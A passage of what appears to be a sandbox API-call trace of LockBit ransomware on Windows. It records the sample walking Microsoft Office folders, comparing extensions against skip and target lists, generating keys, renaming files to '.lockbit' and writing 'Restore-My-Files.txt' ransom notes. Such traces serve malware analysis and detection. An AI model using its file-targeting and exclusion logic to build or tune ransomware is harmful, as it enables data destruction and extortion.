lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\*", fInfoLevelId=0x0, lpFindFileData=0x3d6b120, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x3d6b120) returned 0x55fe78 [0196.239] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0196.239] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeec79e70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeec79e70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeec79e70, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0196.239] lstrcmpiW (lpString1=".", lpString2="..") returned -1 [0196.239] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0196.239] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11d8d700, ftCreationTime.dwHighDateTime=0x1c07b1f, ftLastAccessTime.dwLowDateTime=0xeec79e70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x11d8d700, ftLastWriteTime.dwHighDateTime=0x1c07b1f, nFileSizeHigh=0x0, nFileSizeLow=0x4c450, dwReserved0=0x0, dwReserved1=0x0, cFileName="CAGCAT10.MML", cAlternateFileName="")) returned 1 [0196.239] lstrcmpiW (lpString1=".", lpString2="CAGCAT10.MML") returned -1 [0196.240] lstrcmpiW (lpString1="..", lpString2="CAGCAT10.MML") returned -1 [0196.240] PathFindExtensionW (pszPath="CAGCAT10.MML") returned=".MML" [0196.240] lstrcmpiW (lpString1=".386", lpString2=".MML") returned -1 [0196.240] lstrcmpiW (lpString1=".cmd", lpString2=".MML") returned -1 [0196.240] lstrcmpiW (lpString1=".exe", lpString2=".MML") returned -1 [0196.240] lstrcmpiW (lpString1=".ani", lpString2=".MML") returned -1 [0196.240] lstrcmpiW (lpString1=".adv", lpString2=".MML") returned -1 [0196.240] lstrcmpiW (lpString1=".theme", lpString2=".MML") returned 1 [0196.240] lstrcmpiW (lpString1=".msi", lpString2=".MML") returned 1 [0196.240] lstrcmpiW (lpString1=".msp", lpString2=".MML") returned 1 [0196.240] lstrcmpiW (lpString1=".com", lpString2=".MML") returned -1 [0196.240] lstrcmpiW (lpString1=".diagpkg", lpString2=".MML") returned -1 [0196.240] lstrcmpiW (lpString1=".nls", lpString2=".MML") returned 1 [0196.240] lstrcmpiW (lpString1=".diagcab", lpString2=".MML") returned -1 [0196.240] lstrcmpiW (lpString1=".lock", lpString2=".MML") returned -1 [0196.240] lstrcmpiW (lpString1=".ocx", lpString2=".MML") returned 1 [0196.240] lstrcmpiW (lpString1=".mpa", lpString2=".MML") returned 1 [0196.240] lstrcmpiW (lpString1=".cpl", lpString2=".MML") returned -1 [0196.240] lstrcmpiW (lpString1=".mod", lpString2=".MML") returned 1 [0196.240] lstrcmpiW (lpString1=".hta", lpString2=".MML") returned -1 [0196.240] lstrcmpiW (lpString1=".icns", lpString2=".MML") returned -1 [0196.240] lstrcmpiW (lpString1=".prf", lpString2=".MML") returned 1 [0196.240] lstrcmpiW (lpString1=".rtp", lpString2=".MML") returned 1 [0196.240] lstrcmpiW (lpString1=".diagcfg", lpString2=".MML") returned -1 [0196.240] lstrcmpiW (lpString1=".msstyles", lpString2=".MML") returned 1 [0196.240] lstrcmpiW (lpString1=".bin", lpString2=".MML") returned -1 [0196.240] lstrcmpiW (lpString1=".hlp", lpString2=".MML") returned -1 [0196.240] lstrcmpiW (lpString1=".shs", lpString2=".MML") returned 1 [0196.241] lstrcmpiW (lpString1=".drv", lpString2=".MML") returned -1 [0196.241] lstrcmpiW (lpString1=".wpx", lpString2=".MML") returned 1 [0196.241] lstrcmpiW (lpString1=".bat", lpString2=".MML") returned -1 [0196.241] lstrcmpiW (lpString1=".rom", lpString2=".MML") returned 1 [0196.241] lstrcmpiW (lpString1=".msc", lpString2=".MML") returned 1 [0196.241] lstrcmpiW (lpString1=".spl", lpString2=".MML") returned 1 [0196.241] lstrcmpiW (lpString1=".ps1", lpString2=".MML") returned 1 [0196.241] lstrcmpiW (lpString1=".msu", lpString2=".MML") returned 1 [0196.241] lstrcmpiW (lpString1=".ics", lpString2=".MML") returned -1 [0196.241] lstrcmpiW (lpString1=".key", lpString2=".MML") returned -1 [0196.241] lstrcmpiW (lpString1=".mp3", lpString2=".MML") returned 1 [0196.241] lstrcmpiW (lpString1=".reg", lpString2=".MML") returned 1 [0196.241] lstrcmpiW (lpString1=".dll", lpString2=".MML") returned -1 [0196.241] lstrcmpiW (lpString1=".ini", lpString2=".MML") returned -1 [0196.241] lstrcmpiW (lpString1=".idx", lpString2=".MML") returned -1 [0196.241] lstrcmpiW (lpString1=".sys", lpString2=".MML") returned 1 [0196.241] lstrcmpiW (lpString1=".hlp", lpString2=".MML") returned -1 [0196.241] lstrcmpiW (lpString1=".ico", lpString2=".MML") returned -1 [0196.241] lstrcmpiW (lpString1=".lnk", lpString2=".MML") returned -1 [0196.241] lstrcmpiW (lpString1=".rdp", lpString2=".MML") returned 1 [0196.241] lstrcmpiW (lpString1=".lockbit", lpString2=".MML") returned -1 [0196.241] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="CAGCAT10.MML") returned 1 [0196.241] lstrcmpiW (lpString1="ntldr", lpString2="CAGCAT10.MML") returned 1 [0196.241] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="CAGCAT10.MML") returned 1 [0196.241] lstrcmpiW (lpString1="bootsect.bak", lpString2="CAGCAT10.MML") returned -1 [0196.241] lstrcmpiW (lpString1="autorun.inf", lpString2="CAGCAT10.MML") returned -1 [0196.241] lstrcmpiW (lpString1="thumbs.db", lpString2="CAGCAT10.MML") returned 1 [0196.241] lstrcmpiW (lpString1="iconcache.db", lpString2="CAGCAT10.MML") returned 1 [0196.242] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\") returned="" [0196.242] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\CAGCAT10.MML") returned=".MML" [0196.242] lstrcmpiW (lpString1=".rar", lpString2=".MML") returned 1 [0196.242] lstrcmpiW (lpString1=".zip", lpString2=".MML") returned 1 [0196.242] lstrcmpiW (lpString1=".7z", lpString2=".MML") returned -1 [0196.242] lstrcmpiW (lpString1=".ckp", lpString2=".MML") returned -1 [0196.242] lstrcmpiW (lpString1=".dacpac", lpString2=".MML") returned -1 [0196.242] lstrcmpiW (lpString1=".db", lpString2=".MML") returned -1 [0196.242] lstrcmpiW (lpString1=".db-shm", lpString2=".MML") returned -1 [0196.242] lstrcmpiW (lpString1=".db-wal", lpString2=".MML") returned -1 [0196.242] lstrcmpiW (lpString1=".db3", lpString2=".MML") returned -1 [0196.242] lstrcmpiW (lpString1=".dbf", lpString2=".MML") returned -1 [0196.242] lstrcmpiW (lpString1=".dbc", lpString2=".MML") returned -1 [0196.242] lstrcmpiW (lpString1=".dbs", lpString2=".MML") returned -1 [0196.242] lstrcmpiW (lpString1=".dbt", lpString2=".MML") returned -1 [0196.242] lstrcmpiW (lpString1=".dbv", lpString2=".MML") returned -1 [0196.242] lstrcmpiW (lpString1=".frm", lpString2=".MML") returned -1 [0196.242] lstrcmpiW (lpString1=".mdf", lpString2=".MML") returned -1 [0196.242] lstrcmpiW (lpString1=".mrg", lpString2=".MML") returned 1 [0196.242] lstrcmpiW (lpString1=".mwb", lpString2=".MML") returned 1 [0196.242] lstrcmpiW (lpString1=".myd", lpString2=".MML") returned 1 [0196.242] lstrcmpiW (lpString1=".ndf", lpString2=".MML") returned 1 [0196.242] lstrcmpiW (lpString1=".qry", lpString2=".MML") returned 1 [0196.242] lstrcmpiW (lpString1=".sdb", lpString2=".MML") returned 1 [0196.242] lstrcmpiW (lpString1=".sdf", lpString2=".MML") returned 1 [0196.242] lstrcmpiW (lpString1=".sql", lpString2=".MML") returned 1 [0196.242] lstrcmpiW (lpString1=".sqlite", lpString2=".MML") returned 1 [0196.242] lstrcmpiW (lpString1=".sqlite3", lpString2=".MML") returned 1 [0196.243] lstrcmpiW (lpString1=".sqlitedb", lpString2=".MML") returned 1 [0196.243] lstrcmpiW (lpString1=".tmd", lpString2=".MML") returned 1 [0196.243] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\CAGCAT10.MML.lockbit") returned 75 [0196.243] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\CAGCAT10.MML" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\1033\\cagcat10.mml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0196.247] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0196.247] malloc (_Size=0x40068) returned 0x1ff1e60 [0196.247] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=312400) returned 1 [0196.247] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.248] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.248] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0196.248] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.248] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.248] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0196.248] ReadFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0196.251] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\CAGCAT10.MML.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\CAGCAT10.MML.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0196.251] malloc (_Size=0xac) returned 0x1fa2ed8 [0196.251] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xac, FileInformationClass=0xa) returned 0x0 [0196.253] free (_Block=0x1fa2ed8) [0196.253] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\CAGCAT10.MML" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033") returned 1 [0196.253] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\Restore-My-Files.txt") returned 75 [0196.253] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\1033\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0196.255] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0196.255] malloc (_Size=0x40068) returned 0x3d70450 [0196.255] WriteFile (in: hFile=0x2a4, lpBuffer=0x1fa30f8, nNumberOfBytesToWrite=0x472, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x1fa30f8, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 0x0 [0196.256] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11d8d700, ftCreationTime.dwHighDateTime=0x1c07b1f, ftLastAccessTime.dwLowDateTime=0xeec79e70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x11d8d700, ftLastWriteTime.dwHighDateTime=0x1c07b1f, nFileSizeHigh=0x0, nFileSizeLow=0x4c450, dwReserved0=0x0, dwReserved1=0x0, cFileName="CAGCAT10.MML", cAlternateFileName="")) returned 0 [0196.256] FindClose (in: hFindFile=0x55fe78 | out: hFindFile=0x55fe78) returned 1 [0196.257] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf2162900, ftCreationTime.dwHighDateTime=0x1ca9120, ftLastAccessTime.dwLowDateTime=0x51b925d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf2162900, ftLastWriteTime.dwHighDateTime=0x1ca9120, nFileSizeHigh=0x0, nFileSizeLow=0x3da0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CAGCAT10.DLL", cAlternateFileName="")) returned 1 [0196.257] lstrcmpiW (lpString1=".", lpString2="CAGCAT10.DLL") returned -1 [0196.257] lstrcmpiW (lpString1="..", lpString2="CAGCAT10.DLL") returned -1 [0196.257] PathFindExtensionW (pszPath="CAGCAT10.DLL") returned=".DLL" [0196.257] lstrcmpiW (lpString1=".386", lpString2=".DLL") returned -1 [0196.257] lstrcmpiW (lpString1=".cmd", lpString2=".DLL") returned -1 [0196.257] lstrcmpiW (lpString1=".exe", lpString2=".DLL") returned 1 [0196.257] lstrcmpiW (lpString1=".ani", lpString2=".DLL") returned -1 [0196.257] lstrcmpiW (lpString1=".adv", lpString2=".DLL") returned -1 [0196.257] lstrcmpiW (lpString1=".theme", lpString2=".DLL") returned 1 [0196.257] lstrcmpiW (lpString1=".msi", lpString2=".DLL") returned 1 [0196.257] lstrcmpiW (lpString1=".msp", lpString2=".DLL") returned 1 [0196.257] lstrcmpiW (lpString1=".com", lpString2=".DLL") returned -1 [0196.257] lstrcmpiW (lpString1=".diagpkg", lpString2=".DLL") returned -1 [0196.257] lstrcmpiW (lpString1=".nls", lpString2=".DLL") returned 1 [0196.257] lstrcmpiW (lpString1=".diagcab", lpString2=".DLL") returned -1 [0196.257] lstrcmpiW (lpString1=".lock", lpString2=".DLL") returned 1 [0196.257] lstrcmpiW (lpString1=".ocx", lpString2=".DLL") returned 1 [0196.257] lstrcmpiW (lpString1=".mpa", lpString2=".DLL") returned 1 [0196.258] lstrcmpiW (lpString1=".cpl", lpString2=".DLL") returned -1 [0196.258] lstrcmpiW (lpString1=".mod", lpString2=".DLL") returned 1 [0196.258] lstrcmpiW (lpString1=".hta", lpString2=".DLL") returned 1 [0196.258] lstrcmpiW (lpString1=".icns", lpString2=".DLL") returned 1 [0196.258] lstrcmpiW (lpString1=".prf", lpString2=".DLL") returned 1 [0196.258] lstrcmpiW (lpString1=".rtp", lpString2=".DLL") returned 1 [0196.258] lstrcmpiW (lpString1=".diagcfg", lpString2=".DLL") returned -1 [0196.258] lstrcmpiW (lpString1=".msstyles", lpString2=".DLL") returned 1 [0196.258] lstrcmpiW (lpString1=".bin", lpString2=".DLL") returned -1 [0196.258] lstrcmpiW (lpString1=".hlp", lpString2=".DLL") returned 1 [0196.258] lstrcmpiW (lpString1=".shs", lpString2=".DLL") returned 1 [0196.258] lstrcmpiW (lpString1=".drv", lpString2=".DLL") returned 1 [0196.258] lstrcmpiW (lpString1=".wpx", lpString2=".DLL") returned 1 [0196.258] lstrcmpiW (lpString1=".bat", lpString2=".DLL") returned -1 [0196.258] lstrcmpiW (lpString1=".rom", lpString2=".DLL") returned 1 [0196.258] lstrcmpiW (lpString1=".msc", lpString2=".DLL") returned 1 [0196.258] lstrcmpiW (lpString1=".spl", lpString2=".DLL") returned 1 [0196.258] lstrcmpiW (lpString1=".ps1", lpString2=".DLL") returned 1 [0196.258] lstrcmpiW (lpString1=".msu", lpString2=".DLL") returned 1 [0196.259] lstrcmpiW (lpString1=".ics", lpString2=".DLL") returned 1 [0196.259] lstrcmpiW (lpString1=".key", lpString2=".DLL") returned 1 [0196.259] lstrcmpiW (lpString1=".mp3", lpString2=".DLL") returned 1 [0196.259] lstrcmpiW (lpString1=".reg", lpString2=".DLL") returned 1 [0196.259] lstrcmpiW (lpString1=".dll", lpString2=".DLL") returned 0 [0196.259] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x130a0400, ftCreationTime.dwHighDateTime=0x1c07b1f, ftLastAccessTime.dwLowDateTime=0x60120f70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x130a0400, ftLastWriteTime.dwHighDateTime=0x1c07b1f, nFileSizeHigh=0x0, nFileSizeLow=0x603d8, dwReserved0=0x0, dwReserved1=0x0, cFileName="CAGCAT10.MMW", cAlternateFileName="")) returned 1 [0196.259] lstrcmpiW (lpString1=".", lpString2="CAGCAT10.MMW") returned -1 [0196.259] lstrcmpiW (lpString1="..", lpString2="CAGCAT10.MMW") returned -1 [0196.259] PathFindExtensionW (pszPath="CAGCAT10.MMW") returned=".MMW" [0196.259] lstrcmpiW (lpString1=".386", lpString2=".MMW") returned -1 [0196.259] lstrcmpiW (lpString1=".cmd", lpString2=".MMW") returned -1 [0196.259] lstrcmpiW (lpString1=".exe", lpString2=".MMW") returned -1 [0196.259] lstrcmpiW (lpString1=".ani", lpString2=".MMW") returned -1 [0196.259] lstrcmpiW (lpString1=".adv", lpString2=".MMW") returned -1 [0196.259] lstrcmpiW (lpString1=".theme", lpString2=".MMW") returned 1 [0196.259] lstrcmpiW (lpString1=".msi", lpString2=".MMW") returned 1 [0196.259] lstrcmpiW (lpString1=".msp", lpString2=".MMW") returned 1 [0196.259] lstrcmpiW (lpString1=".com", lpString2=".MMW") returned -1 [0196.259] lstrcmpiW (lpString1=".diagpkg", lpString2=".MMW") returned -1 [0196.259] lstrcmpiW (lpString1=".nls", lpString2=".MMW") returned 1 [0196.259] lstrcmpiW (lpString1=".diagcab", lpString2=".MMW") returned -1 [0196.260] lstrcmpiW (lpString1=".lock", lpString2=".MMW") returned -1 [0196.260] lstrcmpiW (lpString1=".ocx", lpString2=".MMW") returned 1 [0196.260] lstrcmpiW (lpString1=".mpa", lpString2=".MMW") returned 1 [0196.260] lstrcmpiW (lpString1=".cpl", lpString2=".MMW") returned -1 [0196.260] lstrcmpiW (lpString1=".mod", lpString2=".MMW") returned 1 [0196.260] lstrcmpiW (lpString1=".hta", lpString2=".MMW") returned -1 [0196.260] lstrcmpiW (lpString1=".icns", lpString2=".MMW") returned -1 [0196.260] lstrcmpiW (lpString1=".prf", lpString2=".MMW") returned 1 [0196.260] lstrcmpiW (lpString1=".rtp", lpString2=".MMW") returned 1 [0196.260] lstrcmpiW (lpString1=".diagcfg", lpString2=".MMW") returned -1 [0196.260] lstrcmpiW (lpString1=".msstyles", lpString2=".MMW") returned 1 [0196.260] lstrcmpiW (lpString1=".bin", lpString2=".MMW") returned -1 [0196.260] lstrcmpiW (lpString1=".hlp", lpString2=".MMW") returned -1 [0196.260] lstrcmpiW (lpString1=".shs", lpString2=".MMW") returned 1 [0196.260] lstrcmpiW (lpString1=".drv", lpString2=".MMW") returned -1 [0196.260] lstrcmpiW (lpString1=".wpx", lpString2=".MMW") returned 1 [0196.260] lstrcmpiW (lpString1=".bat", lpString2=".MMW") returned -1 [0196.260] lstrcmpiW (lpString1=".rom", lpString2=".MMW") returned 1 [0196.260] lstrcmpiW (lpString1=".msc", lpString2=".MMW") returned 1 [0196.260] lstrcmpiW (lpString1=".spl", lpString2=".MMW") returned 1 [0196.260] lstrcmpiW (lpString1=".ps1", lpString2=".MMW") returned 1 [0196.261] lstrcmpiW (lpString1=".msu", lpString2=".MMW") returned 1 [0196.261] lstrcmpiW (lpString1=".ics", lpString2=".MMW") returned -1 [0196.261] lstrcmpiW (lpString1=".key", lpString2=".MMW") returned -1 [0196.261] lstrcmpiW (lpString1=".mp3", lpString2=".MMW") returned 1 [0196.261] lstrcmpiW (lpString1=".reg", lpString2=".MMW") returned 1 [0196.261] lstrcmpiW (lpString1=".dll", lpString2=".MMW") returned -1 [0196.261] lstrcmpiW (lpString1=".ini", lpString2=".MMW") returned -1 [0196.261] lstrcmpiW (lpString1=".idx", lpString2=".MMW") returned -1 [0196.261] lstrcmpiW (lpString1=".sys", lpString2=".MMW") returned 1 [0196.261] lstrcmpiW (lpString1=".hlp", lpString2=".MMW") returned -1 [0196.261] lstrcmpiW (lpString1=".ico", lpString2=".MMW") returned -1 [0196.261] lstrcmpiW (lpString1=".lnk", lpString2=".MMW") returned -1 [0196.261] lstrcmpiW (lpString1=".rdp", lpString2=".MMW") returned 1 [0196.261] lstrcmpiW (lpString1=".lockbit", lpString2=".MMW") returned -1 [0196.261] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="CAGCAT10.MMW") returned 1 [0196.261] lstrcmpiW (lpString1="ntldr", lpString2="CAGCAT10.MMW") returned 1 [0196.261] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="CAGCAT10.MMW") returned 1 [0196.261] lstrcmpiW (lpString1="bootsect.bak", lpString2="CAGCAT10.MMW") returned -1 [0196.261] lstrcmpiW (lpString1="autorun.inf", lpString2="CAGCAT10.MMW") returned -1 [0196.261] lstrcmpiW (lpString1="thumbs.db", lpString2="CAGCAT10.MMW") returned 1 [0196.261] lstrcmpiW (lpString1="iconcache.db", lpString2="CAGCAT10.MMW") returned 1 [0196.261] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\") returned="" [0196.262] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\CAGCAT10.MMW") returned=".MMW" [0196.262] lstrcmpiW (lpString1=".rar", lpString2=".MMW") returned 1 [0196.262] lstrcmpiW (lpString1=".zip", lpString2=".MMW") returned 1 [0196.262] lstrcmpiW (lpString1=".7z", lpString2=".MMW") returned -1 [0196.262] lstrcmpiW (lpString1=".ckp", lpString2=".MMW") returned -1 [0196.262] lstrcmpiW (lpString1=".dacpac", lpString2=".MMW") returned -1 [0196.262] lstrcmpiW (lpString1=".db", lpString2=".MMW") returned -1 [0196.262] lstrcmpiW (lpString1=".db-shm", lpString2=".MMW") returned -1 [0196.262] lstrcmpiW (lpString1=".db-wal", lpString2=".MMW") returned -1 [0196.262] lstrcmpiW (lpString1=".db3", lpString2=".MMW") returned -1 [0196.262] lstrcmpiW (lpString1=".dbf", lpString2=".MMW") returned -1 [0196.262] lstrcmpiW (lpString1=".dbc", lpString2=".MMW") returned -1 [0196.262] lstrcmpiW (lpString1=".dbs", lpString2=".MMW") returned -1 [0196.262] lstrcmpiW (lpString1=".dbt", lpString2=".MMW") returned -1 [0196.262] lstrcmpiW (lpString1=".dbv", lpString2=".MMW") returned -1 [0196.262] lstrcmpiW (lpString1=".frm", lpString2=".MMW") returned -1 [0196.262] lstrcmpiW (lpString1=".mdf", lpString2=".MMW") returned -1 [0196.262] lstrcmpiW (lpString1=".mrg", lpString2=".MMW") returned 1 [0196.262] lstrcmpiW (lpString1=".mwb", lpString2=".MMW") returned 1 [0196.262] lstrcmpiW (lpString1=".myd", lpString2=".MMW") returned 1 [0196.262] lstrcmpiW (lpString1=".ndf", lpString2=".MMW") returned 1 [0196.262] lstrcmpiW (lpString1=".qry", lpString2=".MMW") returned 1 [0196.263] lstrcmpiW (lpString1=".sdb", lpString2=".MMW") returned 1 [0196.263] lstrcmpiW (lpString1=".sdf", lpString2=".MMW") returned 1 [0196.263] lstrcmpiW (lpString1=".sql", lpString2=".MMW") returned 1 [0196.263] lstrcmpiW (lpString1=".sqlite", lpString2=".MMW") returned 1 [0196.263] lstrcmpiW (lpString1=".sqlite3", lpString2=".MMW") returned 1 [0196.263] lstrcmpiW (lpString1=".sqlitedb", lpString2=".MMW") returned 1 [0196.263] lstrcmpiW (lpString1=".tmd", lpString2=".MMW") returned 1 [0196.263] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\CAGCAT10.MMW.lockbit") returned 70 [0196.263] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\CAGCAT10.MMW" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\cagcat10.mmw"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0196.265] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0196.265] malloc (_Size=0x40068) returned 0x3f70048 [0196.265] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3f70060 | out: lpFileSize=0x3f70060*=394200) returned 1 [0196.265] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.265] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.265] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb007c) returned 0x0 [0196.266] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.266] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.266] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb008c) returned 0x0 [0196.266] ReadFile (in: hFile=0x338, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0196.271] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\CAGCAT10.MMW.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\CAGCAT10.MMW.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0196.271] malloc (_Size=0xa2) returned 0x1fa2ed8 [0196.271] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa2, FileInformationClass=0xa) returned 0x0 [0196.272] free (_Block=0x1fa2ed8) [0196.272] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\CAGCAT10.MMW" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") returned 1 [0196.273] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt") returned 70 [0196.273] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0196.279] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0196.279] malloc (_Size=0x40068) returned 0x3df0008 [0196.279] WriteFile (in: hFile=0x2a4, lpBuffer=0x1fa30f8*, nNumberOfBytesToWrite=0x472, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x1fa30f8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0196.281] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, 